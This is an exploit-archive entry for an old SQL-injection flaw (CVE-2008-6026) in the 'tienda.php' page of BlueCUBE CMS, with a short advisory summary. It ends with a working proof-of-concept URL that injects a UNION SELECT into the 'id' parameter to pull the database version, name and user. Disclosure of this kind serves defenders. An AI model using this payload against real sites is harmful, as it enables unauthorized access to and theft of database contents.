BlueCUBE CMS - 'tienda.php' SQL Injection



EKU-ID: 37320 CVE: CVE-2008-6026;OSVDB-48465 OSVDB-ID:
Author: r45c4l Published: 2008-09-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/31323/info

BlueCUBE CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/tienda.php?id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/*